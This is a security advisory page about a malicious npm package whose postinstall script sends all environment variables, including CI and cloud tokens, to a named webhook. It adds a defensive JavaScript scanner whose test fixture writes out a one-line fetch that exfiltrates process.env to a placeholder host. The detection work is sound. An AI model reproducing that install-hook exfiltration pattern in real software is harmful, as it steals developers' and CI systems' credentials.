Vulnerability
Malicious code in @ci-lifecycle-test/postinstall-ping (npm)
---

## Source: amazon-inspector (75c160ad40a237c1e682c696ebd0aec2861ca072f47bd5b725bc80f7f95ed509)

The package's postinstall lifecycle script (postinstall.js) executes automatically on `npm install` and POSTs the JSON-serialized contents of the entire process.env to https://eoarlb39lor5s7x.m.pipedream.net. The fetch is wired with `.catch(() => {})`, so the exfiltration fails silently and produces no installer-visible error. On CI runners and developer machines, process.env routinely holds high-value secrets (GITHUB_TOKEN, NPM_TOKEN, AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY, CI provider tokens, arbitrary deploy credentials), all of which are shipped to the attacker-controlled Pipedream webhook in a single bulk dump. There is no license check, telemetry disclosure, or other legitimate reason to enumerate the entire environment; the indiscriminate serialization combined with a third-party webhook destination is the canonical install-time credential-harvest shape.
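As an added example (not code from the advisory or from the package), a static screen for the shape described above: it walks a package's install-time lifecycle hooks, resolves the script each one runs, and flags whole-environment serialization combined with an outbound call and a swallowed error. The package names, file contents and webhook URL below are constructed fixtures.

```javascript
// Added example, not the advisory's or the package's code: a static screen for the
// install-time credential-harvest shape in npm lifecycle scripts.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators: whole-environment serialization, outbound call, swallowed errors.
const ENV_DUMP = /JSON\.stringify\(\s*process\.env\s*\)/;
const NETWORK = /\bfetch\s*\(|\bhttps?\.request\s*\(|\.post\s*\(/;
const SILENT_CATCH = /\.catch\(\s*\(\s*\)\s*=>\s*\{\s*\}\s*\)/;
const REMOTE_URL = /https?:\/\/[^\s'"`]+/g;

// pkg: parsed package.json; files: map of relative path -> source text
// (read from the unpacked tarball in practice; supplied inline here).
function screenLifecycleScripts(pkg, files) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (!cmd) continue;
    // Lifecycle commands are usually "node <file>"; resolve that file.
    const m = cmd.match(/\bnode\s+(\S+\.c?js)\b/);
    const src = m ? files[m[1].replace(/^\.\//, '')] : undefined;
    if (src === undefined) {
      findings.push({ hook, cmd, indicators: ['unresolved-script'], urls: [] });
      continue;
    }
    const indicators = [];
    if (ENV_DUMP.test(src)) indicators.push('env-dump');
    if (NETWORK.test(src)) indicators.push('network');
    if (SILENT_CATCH.test(src)) indicators.push('silent-catch');
    findings.push({ hook, cmd, indicators, urls: src.match(REMOTE_URL) || [] });
  }
  return findings;
}

// The combination that warrants blocking the install: env dump plus egress.
function isCredentialHarvestShape(findings) {
  return findings.some(
    (f) => f.indicators.includes('env-dump') && f.indicators.includes('network'),
  );
}

// Constructed fixtures (not the real package; the URL is a placeholder).
const SUSPECT_PKG = { name: 'sample-pkg', scripts: { postinstall: 'node postinstall.js' } };
const SUSPECT_FILES = {
  'postinstall.js': "fetch('https://webhook.invalid/hook', { method: 'POST',\n" +
    "  body: JSON.stringify(process.env) }).catch(() => {});",
};
const BENIGN_PKG = { name: 'benign-pkg', scripts: { postinstall: 'node hello.js' } };
const BENIGN_FILES = { 'hello.js': "console.log('thanks for installing');" };

console.log(isCredentialHarvestShape(screenLifecycleScripts(SUSPECT_PKG, SUSPECT_FILES)));
```

A screen like this belongs in the pre-install review step; on CI runners, pair it with `ignore-scripts=true` in `.npmrc` so lifecycle hooks never run before that review happens.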
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs.
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence